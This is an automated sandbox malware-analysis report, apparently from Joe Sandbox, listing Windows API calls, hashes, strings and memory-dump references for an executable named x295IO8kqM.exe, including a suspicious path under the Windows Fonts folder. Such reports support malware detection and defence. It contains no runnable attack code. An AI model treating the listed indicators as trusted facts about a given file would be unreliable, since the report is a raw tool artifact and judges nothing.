                                                  • Opcode Fuzzy Hash: fd3803aa03de2e8909da2f617b558eaad47c0c0dea7754e7ccd67b1cd56bd7db
                                                  • Instruction Fuzzy Hash: DF514A74D00219AADF209F94C988AAEB779FF04304F50447BE501F72D0D7B89D42DB69
                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                                  • GetMessagePos.USER32 ref: 00404A66
                                                  • ScreenToClient.USER32(?,?), ref: 00404A80
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                  • Instruction ID: 24e0014d109499f5a76e1caf6b4fbcffaf68b7ceae62979d4c0808fe7bebc9aa
                                                  • Opcode Fuzzy Hash: a4b558ae7e4897491015dda9e943decd716cde3204bd09074cb68be28bd0a727
                                                  • Instruction Fuzzy Hash: A1015271E40219BADB00DB94DD45FFEBBBCAB54711F10012BBB11F62C0D7B4A9018B95
                                                  APIs
                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                  • MulDiv.KERNEL32(000FE53E,00000064,000FEE30), ref: 00402D4D
                                                  • wsprintfW.USER32 ref: 00402D5D
                                                  • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                  Strings
                                                  • verifying installer: %d%%, xrefs: 00402D57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                  • String ID: verifying installer: %d%%
                                                  • API String ID: 1451636040-82062127
                                                  • Opcode ID: 0a60b3d2e0f7402ebe63dffa8fa2914259ddaa2310b0074e1d9f3c96a519fc93
                                                  • Instruction ID: 3cda0e2316cf55cb202c1321fdb8a93457d01500b45ed37e1556afe5f89d55e5
                                                  • Opcode Fuzzy Hash: 0a60b3d2e0f7402ebe63dffa8fa2914259ddaa2310b0074e1d9f3c96a519fc93
                                                  • Instruction Fuzzy Hash: 1D014470500209ABEF249F61DD49FEA3B69EB04344F008035FA05A92D0DBB999548B59
                                                  APIs
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                  • GlobalFree.KERNEL32(?), ref: 004028E9
                                                  • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                  • CloseHandle.KERNEL32(?), ref: 00402914
                                                  • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                  • String ID:
                                                  • API String ID: 2667972263-0
                                                  • Opcode ID: 717dcf576c097408dac1e53f9241d150a48d45124f8545d76f83d87da111a921
                                                  • Instruction ID: c1a5639659a60ac5c9bd0712390274ed5d57598099091cca2b2fb0d84b3ff26b
                                                  • Opcode Fuzzy Hash: 717dcf576c097408dac1e53f9241d150a48d45124f8545d76f83d87da111a921
                                                  • Instruction Fuzzy Hash: 1621AC72C04128BBCF216FA5CD49D9E7E79EF09324F24023AF520762E1C7795D418BA9
                                                  APIs
                                                  • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                  • wsprintfW.USER32 ref: 004049DF
                                                  • SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: ItemTextlstrlenwsprintf
                                                  • String ID: %u.%u%s%s$&B
                                                  • API String ID: 3540041739-2907463167
                                                  • Opcode ID: 3f9cbcd61382dedef47492561fc60d1a394687e4f71ed9659f8f7d4824f565d5
                                                  • Instruction ID: 7355c158aba8d6b586dda53eb311f6ba2c540b654501303b209b4c25e60a8b93
                                                  • Opcode Fuzzy Hash: 3f9cbcd61382dedef47492561fc60d1a394687e4f71ed9659f8f7d4824f565d5
                                                  • Instruction Fuzzy Hash: 4711D8736041387BEB10A57D9C41E9F368C9B85374F250237FA26F61D2DA79C81282E8
                                                  APIs
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
                                                  • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                                  • Opcode Fuzzy Hash: b3c3789dbf1e9407cfaa69bc32a43c717e622f94ad988b79edf66977fe5f390d
                                                  • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                                  APIs
                                                  • GetDlgItem.USER32(?,?), ref: 00401D00
                                                  • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                  • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                  • String ID:
                                                  • API String ID: 1849352358-0
                                                  • Opcode ID: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                                  • Instruction ID: e9fcbf52d61700e0958b70f2e427462db2dea441f2720d4c42107852d76fa8f5
                                                  • Opcode Fuzzy Hash: cbab7166b0a94f5ac455d44aeb6c9a0590807e083444e8b07b032d0ff1b104c8
                                                  • Instruction Fuzzy Hash: F1F0E172A04104AFD701DBE4DE88CEEBBBDEB48311B104466F601F51A1C674ED418B39
                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401D59
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                  • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                  • CreateFontIndirectW.GDI32(0040BDB0), ref: 00401DD1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID:
                                                  • API String ID: 3808545654-0
                                                  • Opcode ID: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                  • Instruction ID: fb6460544efe8fce5462e25cc9af4f7d3d1b7b368dfcdde6bb1bed5e2218b2c2
                                                  • Opcode Fuzzy Hash: 06fadfaa6bdd1743c224a57f1fa3d051dabd33ef56df0071652300793eec0471
                                                  • Instruction Fuzzy Hash: BC01A231958281AFE7026BB0AE0AB9A7F74FF25301F004479F501B62E2C77810048B6E
                                                  APIs
                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Timeout
                                                  • String ID: !
                                                  • API String ID: 1777923405-2657877971
                                                  • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                  • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                                  • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                  • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                                  APIs
                                                  • WideCharToMultiByte.KERNEL32(?,?,0040A5A8,000000FF,C:\Windows\Fonts\blgeturbulensen\stetikker,00000400,?,?,00000021), ref: 00402583
                                                  • lstrlenA.KERNEL32(C:\Windows\Fonts\blgeturbulensen\stetikker,?,?,0040A5A8,000000FF,C:\Windows\Fonts\blgeturbulensen\stetikker,00000400,?,?,00000021), ref: 0040258E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWidelstrlen
                                                  • String ID: C:\Windows\Fonts\blgeturbulensen\stetikker
                                                  • API String ID: 3109718747-3489122944
                                                  • Opcode ID: b43aae61e20ec5ab73ff83266742d28a6cec7df34d136fa07e0f6db6e49a8326
                                                  • Instruction ID: 2aea9811a9a124710f812c99978ab25d5578c47fcc6e4ef6251516289d3ba225
                                                  • Opcode Fuzzy Hash: b43aae61e20ec5ab73ff83266742d28a6cec7df34d136fa07e0f6db6e49a8326
                                                  • Instruction Fuzzy Hash: 73113A32A41214BEDB10AFB18F4AE9E3264AF94385F20403BF402F61C2D6FC8E41562E
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059D4
                                                  • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 004059DE
                                                  • lstrcatW.KERNEL32(?,00409014), ref: 004059F0
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004059CE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: CharPrevlstrcatlstrlen
                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 2659869361-3355392842
                                                  • Opcode ID: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                                  • Instruction ID: 0310c51cfe5e9f7ce5f17852bd92726e60929743d8abc3d3bdfc5d6511664db2
                                                  • Opcode Fuzzy Hash: ce28085f9c7adc99732b92a49d05da966114328c7b00a7a022c5dbca455b4791
                                                  • Instruction Fuzzy Hash: C0D0A731111530ABC211AB488D04DDF739C9E463453424037F101B31A1D7785D5197FE
                                                  APIs
                                                  • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00402D9D
                                                  • GetTickCount.KERNEL32 ref: 00402DBB
                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                  • ShowWindow.USER32(00000000,00000005,?,?,"C:\Users\user\Desktop\x295IO8kqM.exe",00403500,?), ref: 00402DE6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                  • String ID:
                                                  • API String ID: 2102729457-0
                                                  • Opcode ID: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                  • Instruction ID: 84c2018479133c1a06627c8befec1d2e01839f263682f94960fa8353d768859b
                                                  • Opcode Fuzzy Hash: 011416fe75702845bce1ba086311cd5158525b87b3682f64fb458bf13ee2241f
                                                  • Instruction Fuzzy Hash: 29F0DA30909220BFC7616B24FD4CADB7BA5BB44B11B4145BAF005A11E4D3B95C81CA9D
                                                  APIs
                                                  • SetWindowTextW.USER32(00000000,00428200), ref: 00403BD1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808523309.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_x295IO8kqM.jbxd
                                                  Similarity
                                                  • API ID: TextWindow
                                                  • String ID: "C:\Users\user\Desktop\x295IO8kqM.exe"$1033
                                                  • API String ID: 530164218-513914555
                                                  • Opcode ID: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                                  • Instruction ID: a3bd2acee85f271d60691375da4bc4fc24ae93d70a97cc42eb68c8ddca864a14
                                                  • Opcode Fuzzy Hash: 07cfb7d5982a44ac816326128a11e32eef50163c4320bcc031c4abfc4802e1d0
                                                  • Instruction Fuzzy Hash: C311F631B40611EBC7349F15DC809777BBCEB45719718857FE801A73A2CA39AD038A68
                                                  APIs
                                                  • IsWindowVisible.USER32(?), ref: 0040511C
                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 0040516D
                                                    • Part of subcall function 0040412A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040413C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2808186216.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2808157796.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808241748.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2808276273.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
